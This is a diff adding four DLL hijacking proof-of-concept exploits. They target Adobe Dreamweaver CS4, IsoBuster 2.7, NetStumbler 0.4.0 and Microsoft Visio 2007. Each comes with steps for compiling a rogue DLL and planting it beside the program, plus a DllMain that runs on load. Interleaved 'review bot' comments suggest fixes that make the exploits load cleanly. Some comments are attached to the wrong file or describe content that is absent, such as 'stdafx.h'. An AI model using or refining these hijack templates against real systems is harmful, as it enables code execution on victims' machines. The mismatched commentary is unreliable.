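Review bot: `DllMain` calls `MessageBox` from the `DLL_PROCESS_ATTACH` case, i.e. while the loader lock is held; the DLL best-practice guidance warns against user-interface calls there because the dialog's message loop can load further DLLs and deadlock, so anyone reproducing this test should expect a hang as readily as a dialog — the same pattern is in 34829.c–34832.c. The file also depends on `"stdafx.h"`, which is not part of the commit, so the `Compile` instruction in the header cannot be followed from this file alone; `#include <windows.h>` is the self-contained form. The header promises `one of the following extensions` but no list follows, so that sentence should be reworded or dropped so the comment matches the file.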
@@ -0,0 +1,43 @@
+source: http://www.securityfocus.com/bid/43911/info
+
+Adobe Dreamweaver CS4 is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.
+
+/*
+============================================================================
+Adobe Dreamweaver CS4 - v10.0 Build 4117 DLL Hijacking Exploit (mfc80esn.dll)
+=============================================================================
+
+$ Program: Adobe Dreamweaver
+$ Version: v10.0 Build 4117
+$ Download: http://www.adobe.com/es/products/dreamweaver/
+$ Date: 2010/10/08
+
+Found by Pepelux
+http://www.pepelux.org
+eNYe-Sec - www.enye-sec.org
+
+Tested on: Windows XP SP2 && Windows XP SP3
+
+How to use :
+
+1> Compile this code as mfc80esn.dll
+ gcc -shared -o mfc80esn.dll thiscode.c
+2> Move DLL file to the directory where Dreamweaver is installed
+3> Open any file recognized by Dreamweaver
+*/
+
+
+#include
+#define DllExport __declspec (dllexport)
+int mes()
+{
+ MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
+ return 0;
+}
+BOOL WINAPI DllMain (
+ HANDLE hinstDLL,
+ DWORD fdwReason,
+ LPVOID lpvReserved)
+ {mes();}
diff --git a/platforms/windows/remote/34830.c b/platforms/windows/remote/34830.c
new file mode 100755
index 000000000..a1c019840
--- /dev/null
+++ b/platforms/windows/remote/34830.c
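Review bot: `DllMain` is declared `BOOL WINAPI` but its body `{mes();}` has no `return`, which is undefined behaviour in C; whatever is left in the return register (plausibly the 0 that `mes()` returns, i.e. FALSE) is what the loader sees, so the load may be reported as failed after the dialog has already appeared, and because `fdwReason` is never examined `mes()` runs again on every thread attach and detach. A `return TRUE;` after the call is the minimal correction. `DllExport` is defined and never used, and the `#include` line has lost its operand in the archived copy, so the file does not compile as stored. 34830.c, 34831.c and 34832.c are the same template and share all three points.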
@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/43912/info
+
+IsoBuster is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+IsoBuster 2.7 is vulnerable; other versions may also be affected.
+
+/*
+==================================================================
+IsoBuster v2.7 (Build 2.7.0.0) DLL Hijacking Exploit (wnaspi32.dll)
+===================================================================
+
+$ Program: IsoBuster
+$ Version: v2.7 (Build 2.7.0.0)
+$ Download: http://www.isobuster.com/
+$ Date: 2010/10/08
+
+Found by Pepelux
+http://www.pepelux.org
+eNYe-Sec - www.enye-sec.org
+
+Tested on: Windows XP SP2 && Windows XP SP3
+
+Extensions: " .rar && .r00 ... .r99 && .zoo "
+
+How to use :
+
+1> Compile this code as wnaspi32.dll
+ gcc -shared -o wnaspi32.dll thiscode.c
+2> Move DLL file to the directory where IsoBuster is installed
+3> Open any file recognized by isobuster
+*/
+
+
+#include
+#define DllExport __declspec (dllexport)
+int mes()
+{
+ MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
+ return 0;
+}
+BOOL WINAPI DllMain (
+ HANDLE hinstDLL,
+ DWORD fdwReason,
+ LPVOID lpvReserved)
+ {mes();}
+
diff --git a/platforms/windows/remote/34831.c b/platforms/windows/remote/34831.c
new file mode 100755
index 000000000..a3cc556c0
--- /dev/null
+++ b/platforms/windows/remote/34831.c
@@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/43913/info
+
+NetStumbler is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+NetStumbler 0.4.0 is vulnerable; other versions may also be affected.
+
+/*
+=========================================================
+NetStumbler - v0.4.0 DLL Hijacking Exploit (mfc71esn.dll)
+=========================================================
+
+$ Program: NetStumbler
+$ Version: 0.4.0
+$ Download: http://www.netstumbler.com/
+$ Date: 2010/10/08
+
+Found by Pepelux
+http://www.pepelux.org
+eNYe-Sec - www.enye-sec.org
+
+Tested on: Windows XP SP2 && Windows XP SP3
+
+How to use :
+
+1> Compile this code as mfc80esn.dll
+ gcc -shared -o mfc80esn.dll thiscode.c
+2> Move DLL file to the directory where NetStumbler is installed
+3> Open any file recognized by NetStumbler
+*/
+
+
+#include
+#define DllExport __declspec (dllexport)
+int mes()
+{
+ MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
+ return 0;
+}
+BOOL WINAPI DllMain (
+ HANDLE hinstDLL,
+ DWORD fdwReason,
+ LPVOID lpvReserved)
+ {mes();}
diff --git a/platforms/windows/remote/34832.c b/platforms/windows/remote/34832.c
new file mode 100755
index 000000000..c0e38d333
--- /dev/null
+++ b/platforms/windows/remote/34832.c
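Review bot: The header contradicts itself: the title names `mfc71esn.dll` (as does the files.csv entry added in this commit) while the `How to use` steps say `1> Compile this code as mfc80esn.dll` / `gcc -shared -o mfc80esn.dll thiscode.c`, apparently carried over unchanged from the Dreamweaver and Visio entries; the steps should name `mfc71esn.dll` so the file is internally consistent. Anyone deriving an inventory or detection rule from this entry — for instance checking for an unexpected `mfc71esn.dll` beside the NetStumbler executable — should go by the title and the index, not the steps.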
@@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/43914/info
+
+Microsoft Visio is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+Microsoft Visio 2007 is vulnerable; other versions may also be affected.
+
+/*
+=========================================================
+Microsoft Visio 2007 DLL Hijacking Exploit (mfc80esn.dll)
+=========================================================
+
+$ Program: MS Visio
+$ Version: 2007
+$ Download: http://office.microsoft.com/es-es/downloads/CH010225969.aspx
+$ Date: 2010/10/08
+
+Found by Pepelux
+http://www.pepelux.org
+eNYe-Sec - www.enye-sec.org
+
+Tested on: Windows XP SP2 && Windows XP SP3
+
+How to use :
+
+1> Compile this code as mfc80esn.dll
+ gcc -shared -o mfc80esn.dll thiscode.c
+2> Move DLL file to the directory where Visio is installed
+3> Open any file recognized by msvisio
+*/
+
+
+#include
+#define DllExport __declspec (dllexport)
+int mes()
+{
+ MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
+ return 0;
+}
+BOOL WINAPI DllMain (
+ HANDLE hinstDLL,
+ DWORD fdwReason,
+ LPVOID lpvReserved)
+ {mes();}